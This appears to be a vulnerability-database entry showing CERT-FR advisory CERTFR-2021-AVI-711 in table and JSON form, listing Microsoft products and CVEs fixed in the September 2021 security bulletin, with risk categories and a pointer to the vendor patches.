Microsoft	N/A	Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8)
Microsoft	N/A	Microsoft Dynamics 365 Business Central 2020 Release Wave 2 – Update 17.10
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.7 (includes 16.0 – 16.6)
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)
Microsoft	N/A	HEVC Video Extensions
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10)
Microsoft	N/A	Visual Studio Code
Microsoft	N/A	Microsoft 365 Apps pour Enterprise pour systèmes 32 bits
Microsoft	N/A	MPEG-2 Video Extension
Microsoft	N/A	Microsoft 365 Apps pour Enterprise pour 64 bits Systems
Microsoft	N/A	Microsoft Dynamics 365 Business Central 2021 Release Wave 1 - Update 18.5
Microsoft	Azure	Azure Sphere
Microsoft	Azure	Azure Open Management Infrastructure

References

Title

Publication Time

Tags

Bulletin de sécurité Microsoft du 14 septembre 2021

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Dynamics 365 Business Central 2020 Release Wave 2 \u2013 Update 17.10",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "HEVC Video Extensions",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Visual Studio Code",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft 365 Apps pour Enterprise pour syst\u00e8mes 32 bits",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "MPEG-2 Video Extension",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft 365 Apps pour Enterprise pour 64 bits Systems",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Dynamics 365 Business Central 2021 Release Wave 1 - Update 18.5",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Sphere",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Open Management Infrastructure",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38648",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38648"
    },
    {
      "name": "CVE-2021-38655",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38655"
    },
    {
      "name": "CVE-2021-38644",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38644"
    },
    {
      "name": "CVE-2021-38653",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38653"
    },
    {
      "name": "CVE-2021-38654",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38654"
    },
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    },
    {
      "name": "CVE-2021-38661",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38661"
    },
    {
      "name": "CVE-2021-38650",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38650"
    },
    {
      "name": "CVE-2021-38646",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38646"
    },
    {
      "name": "CVE-2021-36956",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-36956"
    },
    {
      "name": "CVE-2021-38657",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38657"
    },
    {
      "name": "CVE-2021-36952",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-36952"
    },
    {
      "name": "CVE-2021-38659",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38659"
    },
    {
      "name": "CVE-2021-38649",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38649"
    },
    {
      "name": "CVE-2021-26434",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26434"
    },
    {
      "name": "CVE-2021-38645",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38645"
    },
    {
      "name": "CVE-2021-38656",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38656"
    },
    {
      "name": "CVE-2021-26437",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26437"
    },
    {
      "name": "CVE-2021-40440",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-40440"
    }
  ],
  "initial_release_date": "2021-09-16T00:00:00",
  "last_revision_date": "2021-09-16T00:00:00",
  "links": [],
  "reference": "CERTFR-2021-AVI-711",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-16T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Usurpation d\u0027identit\u00e9"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 corrig\u00e9es dans \u003cspan\nclass=\"textit\"\u003eles produits Microsoft\u003c/span\u003e. Elles permettent \u00e0 un\nattaquant de provoquer une ex\u00e9cution de code \u00e0 distance, une atteinte \u00e0\nla confidentialit\u00e9 des donn\u00e9es, une \u00e9l\u00e9vation de privil\u00e8ges et une\nusurpation d\u0027identit\u00e9.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft du 14 septembre 2021",
      "url": "https://msrc.microsoft.com/update-guide/"
    }
  ]
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2021-38648 (GCVE-0-2021-38648)

Vulnerability from cvelistv5

CISA Known Exploited Vulnerability

Data from the CISA Known Exploited Vulnerabilities Catalog

CERTFR-2021-ALE-020

Vulnerability from certfr_alerte

Solution

CERTFR-2021-AVI-711

Vulnerability from certfr_avis

Solution

Tags

Sightings

Nomenclature